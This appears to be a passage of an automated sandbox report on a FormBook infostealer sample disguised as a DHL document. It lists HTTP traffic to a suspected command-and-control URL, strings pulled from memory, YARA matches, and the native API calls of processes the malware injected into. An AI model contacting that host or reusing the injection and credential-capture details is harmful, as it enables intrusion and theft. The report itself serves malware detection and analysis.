Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 08:44:18 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 08:44:21 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 08:44:23 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Source: CKQtyFoaVDYewUznZxosidSwbd.exe, 0000000C.00000002.3726222348.0000000004D00000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.empowermedeco.com
Source: CKQtyFoaVDYewUznZxosidSwbd.exe, 0000000C.00000002.3726222348.0000000004D00000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.empowermedeco.com/fo8o/
Source: netbtugc.exe, 0000000A.00000003.1687881602.00000000078ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: netbtugc.exe, 0000000A.00000003.1687881602.00000000078ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: netbtugc.exe, 0000000A.00000003.1687881602.00000000078ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: netbtugc.exe, 0000000A.00000003.1687881602.00000000078ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: netbtugc.exe, 0000000A.00000002.3725601307.0000000004652000.00000004.10000000.00040000.00000000.sdmp, CKQtyFoaVDYewUznZxosidSwbd.exe, 0000000C.00000002.3724645158.0000000003762000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
Source: netbtugc.exe, 0000000A.00000002.3725601307.0000000004652000.00000004.10000000.00040000.00000000.sdmp, CKQtyFoaVDYewUznZxosidSwbd.exe, 0000000C.00000002.3724645158.0000000003762000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
Source: netbtugc.exe, 0000000A.00000003.1687881602.00000000078ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: netbtugc.exe, 0000000A.00000003.1687881602.00000000078ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: netbtugc.exe, 0000000A.00000003.1687881602.00000000078ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: netbtugc.exe, 0000000A.00000002.3718390365.0000000002AB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: netbtugc.exe, 0000000A.00000002.3718390365.0000000002AB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: netbtugc.exe, 0000000A.00000002.3718390365.0000000002AB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: netbtugc.exe, 0000000A.00000002.3718390365.0000000002A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: netbtugc.exe, 0000000A.00000002.3718390365.0000000002AB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: netbtugc.exe, 0000000A.00000002.3718390365.0000000002AB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: netbtugc.exe, 0000000A.00000003.1684721809.00000000078CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: netbtugc.exe, 0000000A.00000003.1687881602.00000000078ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: netbtugc.exe, 0000000A.00000002.3725601307.0000000004C9A000.00000004.10000000.00040000.00000000.sdmp, CKQtyFoaVDYewUznZxosidSwbd.exe, 0000000C.00000002.3724645158.0000000003DAA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.empowermedeco.com/fo8o/?tjVTF=mxnR
Source: netbtugc.exe, 0000000A.00000003.1687881602.00000000078ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: netbtugc.exe, 0000000A.00000002.3727059052.0000000005EA0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3725601307.000000000432E000.00000004.10000000.00040000.00000000.sdmp, CKQtyFoaVDYewUznZxosidSwbd.exe, 0000000C.00000002.3724645158.000000000343E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
Source: CKQtyFoaVDYewUznZxosidSwbd.exe, 0000000C.00000002.3724645158.000000000343E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.sedo.com/services/parking.php3

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

Code function: 0_2_0046EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_0046EAFF

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

Code function: 0_2_0046ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_0046ED6A

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

0_2_0046EAFF

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

Code function: 0_2_0045AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_0045AA57

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

Code function: 0_2_00489576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00489576

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.3b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3724047677.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1403314556.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3714293337.0000000002750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1402648327.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3724137057.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1403351196.00000000033D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3726222348.0000000004CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3724240548.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.svchost.exe.3b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.3b0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.3724047677.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1403314556.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.3714293337.0000000002750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1402648327.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.3724137057.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1403351196.00000000033D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.3726222348.0000000004CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.3724240548.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: DHL-DOC83972025-1.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: DHL-DOC83972025-1.exe, 00000000.00000000.1247285956.00000000004B2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_e3bcb7d0-d
Source: DHL-DOC83972025-1.exe, 00000000.00000000.1247285956.00000000004B2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_ce87a22e-9
Source: DHL-DOC83972025-1.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_06b508e5-9
Source: DHL-DOC83972025-1.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_d206add5-5

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003DB363 NtClose,	2_2_003DB363
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003B1D09 NtProtectVirtualMemory,	2_2_003B1D09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072B60 NtClose,LdrInitializeThunk,	2_2_03072B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03072DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_03072C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030735C0 NtCreateMutant,LdrInitializeThunk,	2_2_030735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03074340 NtSetContextThread,	2_2_03074340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03074650 NtSuspendThread,	2_2_03074650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072B80 NtQueryInformationFile,	2_2_03072B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072BA0 NtEnumerateValueKey,	2_2_03072BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072BE0 NtQueryValueKey,	2_2_03072BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072BF0 NtAllocateVirtualMemory,	2_2_03072BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072AB0 NtWaitForSingleObject,	2_2_03072AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072AD0 NtReadFile,	2_2_03072AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072AF0 NtWriteFile,	2_2_03072AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072F30 NtCreateSection,	2_2_03072F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072F60 NtCreateProcessEx,	2_2_03072F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072F90 NtProtectVirtualMemory,	2_2_03072F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072FA0 NtQuerySection,	2_2_03072FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072FB0 NtResumeThread,	2_2_03072FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072FE0 NtCreateFile,	2_2_03072FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072E30 NtWriteVirtualMemory,	2_2_03072E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072E80 NtReadVirtualMemory,	2_2_03072E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072EA0 NtAdjustPrivilegesToken,	2_2_03072EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072EE0 NtQueueApcThread,	2_2_03072EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072D00 NtSetInformationFile,	2_2_03072D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072D10 NtMapViewOfSection,	2_2_03072D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072D30 NtUnmapViewOfSection,	2_2_03072D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072DB0 NtEnumerateKey,	2_2_03072DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072DD0 NtDelayExecution,	2_2_03072DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072C00 NtQueryInformationProcess,	2_2_03072C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072C60 NtCreateKey,	2_2_03072C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072CA0 NtQueryInformationToken,	2_2_03072CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072CC0 NtQueryVirtualMemory,	2_2_03072CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072CF0 NtOpenProcess,	2_2_03072CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03073010 NtOpenDirectoryObject,	2_2_03073010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03073090 NtSetValueKey,	2_2_03073090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030739B0 NtGetContextThread,	2_2_030739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03073D10 NtOpenProcessToken,	2_2_03073D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03073D70 NtOpenThread,	2_2_03073D70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B4340 NtSetContextThread,LdrInitializeThunk,	10_2_031B4340
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B4650 NtSuspendThread,LdrInitializeThunk,	10_2_031B4650
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B2B60 NtClose,LdrInitializeThunk,	10_2_031B2B60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B2BA0 NtEnumerateValueKey,LdrInitializeThunk,	10_2_031B2BA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	10_2_031B2BF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B2BE0 NtQueryValueKey,LdrInitializeThunk,	10_2_031B2BE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B2AD0 NtReadFile,LdrInitializeThunk,	10_2_031B2AD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B2AF0 NtWriteFile,LdrInitializeThunk,	10_2_031B2AF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B2F30 NtCreateSection,LdrInitializeThunk,	10_2_031B2F30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B2FB0 NtResumeThread,LdrInitializeThunk,	10_2_031B2FB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B2FE0 NtCreateFile,LdrInitializeThunk,	10_2_031B2FE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B2E80 NtReadVirtualMemory,LdrInitializeThunk,	10_2_031B2E80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B2EE0 NtQueueApcThread,LdrInitializeThunk,	10_2_031B2EE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B2D10 NtMapViewOfSection,LdrInitializeThunk,	10_2_031B2D10
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B2D30 NtUnmapViewOfSection,LdrInitializeThunk,	10_2_031B2D30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B2DD0 NtDelayExecution,LdrInitializeThunk,	10_2_031B2DD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B2DF0 NtQuerySystemInformation,LdrInitializeThunk,	10_2_031B2DF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B2C70 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_031B2C70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B2C60 NtCreateKey,LdrInitializeThunk,	10_2_031B2C60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B2CA0 NtQueryInformationToken,LdrInitializeThunk,	10_2_031B2CA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B35C0 NtCreateMutant,LdrInitializeThunk,	10_2_031B35C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B39B0 NtGetContextThread,LdrInitializeThunk,	10_2_031B39B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B2B80 NtQueryInformationFile,	10_2_031B2B80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B2AB0 NtWaitForSingleObject,	10_2_031B2AB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B2F60 NtCreateProcessEx,	10_2_031B2F60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B2F90 NtProtectVirtualMemory,	10_2_031B2F90
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B2FA0 NtQuerySection,	10_2_031B2FA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B2E30 NtWriteVirtualMemory,	10_2_031B2E30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B2EA0 NtAdjustPrivilegesToken,	10_2_031B2EA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B2D00 NtSetInformationFile,	10_2_031B2D00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B2DB0 NtEnumerateKey,	10_2_031B2DB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B2C00 NtQueryInformationProcess,	10_2_031B2C00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B2CC0 NtQueryVirtualMemory,	10_2_031B2CC0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B2CF0 NtOpenProcess,	10_2_031B2CF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B3010 NtOpenDirectoryObject,	10_2_031B3010
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B3090 NtSetValueKey,	10_2_031B3090
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B3D10 NtOpenProcessToken,	10_2_031B3D10
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_031B3D70 NtOpenThread,	10_2_031B3D70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02777A70 NtReadFile,	10_2_02777A70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02777B50 NtDeleteFile,	10_2_02777B50
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02777BE0 NtClose,	10_2_02777BE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02777920 NtCreateFile,	10_2_02777920
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 10_2_02777D30 NtAllocateVirtualMemory,	10_2_02777D30

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

Code function: 0_2_0045D5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_0045D5EB

Source: C:\Users\user\Desktop\DHL-DOC83972025-1.exe

